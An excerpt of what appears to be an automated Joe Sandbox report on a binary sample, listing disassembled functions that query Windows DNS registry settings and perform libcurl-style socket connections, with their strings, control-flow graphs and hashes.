                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 2bf41deae26bd1ee58eae6c853107fab0a0a7ad710dafb0865a4f200ba4b1bb9
                                                          • Instruction ID: d8e7995b8a8724198e131bd4f1df8c9a1f2fbe18b4882d8c55d7ebc2ebc365c9
                                                          • Opcode Fuzzy Hash: 2bf41deae26bd1ee58eae6c853107fab0a0a7ad710dafb0865a4f200ba4b1bb9
                                                          • Instruction Fuzzy Hash: 93F06D7511930CAFD2109E01DC44DABBBEDEFCD764F05455DF948132118370AE50DAB2
                                                          Function 0030A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0030AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0030AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0030AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0030AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0030AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 0030AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0030AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0030AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0030AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 0030AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 0030ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 0030AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0030AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0030AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0030AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0030AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0030B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                          • API String ID: 4217438148-1047472027
                                                          • Opcode ID: d52f049743602f247148598be84b84c8bdeb7760fd9c1023bdd35bba24e6ffc4
                                                          • Instruction ID: 5da6f4684d1275d39ab267cb9f1f620840a3058d8ea25e6eb837408497e12a28
                                                          • Opcode Fuzzy Hash: d52f049743602f247148598be84b84c8bdeb7760fd9c1023bdd35bba24e6ffc4
                                                          • Instruction Fuzzy Hash: F872DEB1609701AFE321DB24DC92B6BBBE8AF85700F154828F985DB2D1E775E844CB53
                                                          Function 0028A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0028A831
                                                          Strings
                                                          • @, xrefs: 0028A8F4
                                                          • Trying [%s]:%d..., xrefs: 0028A689
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0028ADAC
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0028AE60
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0028A6CE
                                                          • Bind to local port %d failed, trying next, xrefs: 0028AFE5
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0028A796
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0028A871
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0028AE1F
                                                          • cf-socket.c, xrefs: 0028A5CD, 0028A735
                                                          • Trying %s:%d..., xrefs: 0028A7C2, 0028A7DE
                                                          • @, xrefs: 0028AC42
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0028AD0A
                                                          • bind failed with errno %d: %s, xrefs: 0028B080
                                                          • Local port: %hu, xrefs: 0028AF28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 7e450a89ceac812298e04a9affa7744402dd2ad9fa13a2a3216547421021a453
                                                          • Instruction ID: a209be24443def980a9bcdd5d626e09bb3494ebbf082e13b6d8d824342e7b2a3
                                                          • Opcode Fuzzy Hash: 7e450a89ceac812298e04a9affa7744402dd2ad9fa13a2a3216547421021a453
                                                          • Instruction Fuzzy Hash: E7621675519341ABF720DF14C846BABB7E4FF90304F04492AF98897292EB71E865CB93
                                                          Function 00319740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 862 319740-31975b 863 319780-319782 862->863 864 31975d-319768 call 3178a0 862->864 865 319914-31994e call 5d8b70 RegOpenKeyExA 863->865 866 319788-3197a0 call 5d8e00 call 3178a0 863->866 873 3199bb-3199c0 864->873 874 31976e-319770 864->874 877 319950-319955 865->877 878 31995a-319992 RegQueryValueExA RegCloseKey call 5d8b98 865->878 866->873 880 3197a6-3197c5 866->880 875 319a0c-319a15 873->875 879 319772-31977e 874->879 874->880 877->875 892 319997-3199b5 call 3178a0 878->892 879->866 885 319827-319833 880->885 886 3197c7-3197e0 880->886 888 319835-31985c call 30e2b0 * 2 885->888 889 31985f-319872 call 315ca0 885->889 890 3197e2-3197f3 call 5d8b50 886->890 891 3197f6-319809 886->891 888->889 902 3199f0 889->902 903 319878-31987d call 3177b0 889->903 890->891 891->885 901 31980b-319810 891->901 892->873 892->880 901->885 905 319812-319822 901->905 908 3199f5-3199fb call 315d00 902->908 909 319882-319889 903->909 905->875 917 3199fe-319a09 908->917 909->908 913 31988f-31989b call 304fe0 909->913 913->902 921 3198a1-3198c3 call 5d8b50 call 3178a0 913->921 917->875 926 3199c2-3199ed call 30e2b0 * 2 921->926 927 3198c9-3198db call 30e2d0 921->927 926->902 927->926 932 3198e1-3198f0 call 30e2d0 927->932 932->926 937 3198f6-319905 call 3163f0 932->937 942 319f66-319f7f call 315d00 937->942 943 31990b-31990f 937->943 942->917 945 319a3f-319a5a call 316740 call 3163f0 943->945 945->942 951 319a60-319a6e call 316d60 945->951 954 319a70-319a94 call 316200 call 3167e0 call 316320 951->954 955 319a1f-319a39 call 316840 call 3163f0 951->955 966 319a16-319a19 954->966 967 319a96-319ac6 call 30d120 954->967 955->942 955->945 966->955 968 319fc1 966->968 973 319ae1-319af7 call 30d190 967->973 974 319ac8-319adb call 30d120 967->974 970 319fc5-319ffd call 315d00 call 30e2b0 * 2 968->970 970->917 973->955 980 319afd-319b09 call 304fe0 973->980 974->955 974->973 980->968 986 319b0f-319b29 call 30e730 980->986 991 319f84-319f88 986->991 992 319b2f-319b3a call 3178a0 986->992 994 319f95-319f99 991->994 992->991 999 319b40-319b54 call 30e760 992->999 996 319fa0-319fb6 call 30ebf0 * 2 994->996 997 319f9b-319f9e 994->997 1009 319fb7-319fbe 996->1009 997->968 997->996 1005 319f8a-319f92 999->1005 1006 319b5a-319b6e call 30e730 999->1006 1005->994 1012 319b70-31a004 1006->1012 1013 319b8c-319b97 call 3163f0 1006->1013 1009->968 1018 31a015-31a01d 1012->1018 1021 319c9a-319cab call 30ea00 1013->1021 1022 319b9d-319bbf call 316740 call 3163f0 1013->1022 1019 31a024-31a045 call 30ebf0 * 2 1018->1019 1020 31a01f-31a022 1018->1020 1019->970 1020->970 1020->1019 1029 319f31-319f35 1021->1029 1030 319cb1-319ccd call 30ea00 call 30e960 1021->1030 1022->1021 1040 319bc5-319bda call 316d60 1022->1040 1034 319f40-319f61 call 30ebf0 * 2 1029->1034 1035 319f37-319f3a 1029->1035 1048 319cfd-319d0e call 30e960 1030->1048 1049 319ccf 1030->1049 1034->955 1035->955 1035->1034 1040->1021 1051 319be0-319bf4 call 316200 call 3167e0 1040->1051 1059 319d10 1048->1059 1060 319d53-319d55 1048->1060 1053 319cd1-319cec call 30e9f0 call 30e4a0 1049->1053 1051->1021 1068 319bfa-319c0b call 316320 1051->1068 1073 319d47-319d51 1053->1073 1074 319cee-319cfb call 30e9d0 1053->1074 1063 319d12-319d2d call 30e9f0 call 30e4a0 1059->1063 1066 319e69-319e8e call 30ea40 call 30e440 1060->1066 1091 319d5a-319d6f call 30e960 1063->1091 1092 319d2f-319d3c call 30e9d0 1063->1092 1087 319e90-319e92 1066->1087 1088 319e94-319eaa call 30e3c0 1066->1088 1084 319c11-319c1c call 317b70 1068->1084 1085 319b75-319b86 call 30ea00 1068->1085 1078 319dca-319ddb call 30e960 1073->1078 1074->1048 1074->1053 1096 319ddd-319ddf 1078->1096 1097 319e2e-319e36 1078->1097 1084->1013 1109 319c22-319c33 call 30e960 1084->1109 1085->1013 1106 319f2d 1085->1106 1094 319eb3-319ec4 call 30e9c0 1087->1094 1115 319eb0-319eb1 1088->1115 1116 31a04a-31a04c 1088->1116 1111 319d71-319d73 1091->1111 1112 319dc2 1091->1112 1092->1063 1118 319d3e-319d42 1092->1118 1094->955 1123 319eca-319ed0 1094->1123 1105 319e06-319e21 call 30e9f0 call 30e4a0 1096->1105 1102 319e38-319e3b 1097->1102 1103 319e3d-319e5b call 30ebf0 * 2 1097->1103 1102->1103 1113 319e5e-319e67 1102->1113 1103->1113 1146 319de1-319dee call 30ec80 1105->1146 1147 319e23-319e2c call 30eac0 1105->1147 1106->1029 1132 319c35 1109->1132 1133 319c66-319c75 call 3178a0 1109->1133 1121 319d9a-319db5 call 30e9f0 call 30e4a0 1111->1121 1112->1078 1113->1066 1113->1094 1115->1094 1126 31a057-31a070 call 30ebf0 * 2 1116->1126 1127 31a04e-31a051 1116->1127 1118->1066 1162 319d75-319d82 call 30ec80 1121->1162 1163 319db7-319dc0 call 30eac0 1121->1163 1130 319ee5-319ef2 call 30e9f0 1123->1130 1126->1009 1127->968 1127->1126 1130->955 1149 319ef8-319f0e call 30e440 1130->1149 1141 319c37-319c51 call 30e9f0 1132->1141 1154 31a011 1133->1154 1155 319c7b-319c8f call 30e7c0 1133->1155 1141->1013 1172 319c57-319c64 call 30e9d0 1141->1172 1165 319df1-319e04 call 30e960 1146->1165 1147->1165 1170 319f10-319f26 call 30e3c0 1149->1170 1171 319ed2-319edf call 30e9e0 1149->1171 1154->1018 1155->1013 1175 319c95-31a00e 1155->1175 1179 319d85-319d98 call 30e960 1162->1179 1163->1179 1165->1097 1165->1105 1170->1171 1188 319f28 1170->1188 1171->955 1171->1130 1172->1133 1172->1141 1175->1154 1179->1112 1179->1121 1188->968
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00319946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00319974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0031998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                          • API String ID: 3677997916-4129964100
                                                          • Opcode ID: c396a83090cc9e72bf6ed2046bcfb6857aa088973be82cadbaa1ccdc98c90b00
                                                          • Instruction ID: cd8f474ef6c4629591eb4abd89789a370a9af52766288efc20d67dbe5a469249
                                                          • Opcode Fuzzy Hash: c396a83090cc9e72bf6ed2046bcfb6857aa088973be82cadbaa1ccdc98c90b00
                                                          • Instruction Fuzzy Hash: 06320CB5A04201ABEB17AB20EC52B9B76D8AF58304F094839FC099B263F731ED55D753
                                                          Function 00288B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1365 288b50-288b69 1366 288b6b-288b74 1365->1366 1367 288be6 1365->1367 1369 288beb-288bf2 1366->1369 1370 288b76-288b8d 1366->1370 1368 288be9 1367->1368 1368->1369 1371 288b8f-288ba7 call 266e40 1370->1371 1372 288bf3-288bfe call 28a550 1370->1372 1379 288cd9-288d16 SleepEx 1371->1379 1380 288bad-288baf 1371->1380 1377 288de4-288def 1372->1377 1378 288c04-288c08 1372->1378 1383 288e8c-288e95 1377->1383 1384 288df5-288e19 call 28a150 1377->1384 1381 288dbd-288dc3 1378->1381 1382 288c0e-288c1d 1378->1382 1397 288d18-288d20 1379->1397 1398 288d22 1379->1398 1385 288bb5-288bb9 1380->1385 1386 288ca6-288cb0 1380->1386 1381->1368 1391 288c1f-288c30 connect 1382->1391 1392 288c35-288c48 call 28a150 1382->1392 1389 288f00-288f06 1383->1389 1390 288e97-288e9c 1383->1390 1421 288e88 1384->1421 1422 288e1b-288e26 1384->1422 1385->1369 1387 288bbb-288bc2 1385->1387 1386->1379 1393 288cb2-288cb8 1386->1393 1387->1369 1396 288bc4-288bcc 1387->1396 1389->1369 1399 288e9e-288eb6 call 262a00 1390->1399 1400 288edf-288eef call 2578b0 1390->1400 1391->1392 1420 288c4d-288c4f 1392->1420 1401 288ddc-288dde 1393->1401 1402 288cbe-288cd4 call 28b180 1393->1402 1405 288bce-288bd2 1396->1405 1406 288bd4-288bda 1396->1406 1408 288d26-288d39 1397->1408 1398->1408 1399->1400 1419 288eb8-288edd call 263410 * 2 1399->1419 1424 288ef2-288efc 1400->1424 1401->1368 1401->1377 1402->1377 1405->1369 1405->1406 1406->1369 1413 288bdc-288be1 1406->1413 1416 288d3b-288d3d 1408->1416 1417 288d43-288d61 call 26d8c0 call 28a150 1408->1417 1423 288dac-288db8 call 2950a0 1413->1423 1416->1401 1416->1417 1444 288d66-288d74 1417->1444 1419->1424 1427 288c8e-288c93 1420->1427 1428 288c51-288c58 1420->1428 1421->1383 1429 288e28-288e2c 1422->1429 1430 288e2e-288e85 call 26d090 call 294fd0 1422->1430 1423->1369 1424->1389 1437 288dc8-288dd9 call 28b100 1427->1437 1438 288c99-288c9f 1427->1438 1428->1427 1434 288c5a-288c62 1428->1434 1429->1421 1429->1430 1430->1421 1440 288c6a-288c70 1434->1440 1441 288c64-288c68 1434->1441 1437->1401 1438->1386 1440->1427 1447 288c72-288c8b call 2950a0 1440->1447 1441->1427 1441->1440 1444->1369 1445 288d7a-288d81 1444->1445 1445->1369 1450 288d87-288d8f 1445->1450 1447->1427 1454 288d9b-288da1 1450->1454 1455 288d91-288d95 1450->1455 1454->1369 1458 288da7 1454->1458 1455->1369 1455->1454 1458->1423
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00288C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00288CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnect
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 238548546-879669977
                                                          • Opcode ID: 4d12a2a9540cea5cfaf49808a81d6d911da8edd74585eb05723e61c9303475c1
                                                          • Instruction ID: 9b5d8662680c145e8dff9085f12bd9ef6c920bfbd252ad610b1671fc7fc619f7
                                                          • Opcode Fuzzy Hash: 4d12a2a9540cea5cfaf49808a81d6d911da8edd74585eb05723e61c9303475c1
                                                          • Instruction Fuzzy Hash: 74B1D378615306AFDB10EF24C885B66B7E0AF45318F44852DF8598B2D2EB70ECA5CB61
                                                          Function 00252F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1459 252f17-252f8c call 6deb30 call 6def20 1464 2531c9-2531cd 1459->1464 1465 252f91-252ff4 call 251619 RegOpenKeyExA 1464->1465 1466 2531d3-2531d6 1464->1466 1469 2531c5 1465->1469 1470 252ffa-25300b 1465->1470 1469->1464 1471 25315c-2531ac RegEnumKeyExA 1470->1471 1472 253010-253083 call 251619 RegOpenKeyExA 1471->1472 1473 2531b2-2531c2 1471->1473 1477 25314e-253152 1472->1477 1478 253089-2530d4 RegQueryValueExA 1472->1478 1473->1469 1477->1471 1479 2530d6-253137 call 6dee00 call 6dee90 call 6def20 call 6ded30 call 6def20 call 6dd2a0 1478->1479 1480 25313b-25314b RegCloseKey 1478->1480 1479->1480 1480->1477
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: 522ad8e3e1ec71122dcc993484fd312c015d8f5da27a892ad99900bb1d23657b
                                                          • Instruction ID: 73e5ac733f9247fef45617954875147ce426725680410865ef6e69898dfcafa4
                                                          • Opcode Fuzzy Hash: 522ad8e3e1ec71122dcc993484fd312c015d8f5da27a892ad99900bb1d23657b
                                                          • Instruction Fuzzy Hash: 5671A1B49143099FDB50EF69C98479EBBF0FF84308F10885DE99897351E7749A888F92
                                                          Function 002576A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
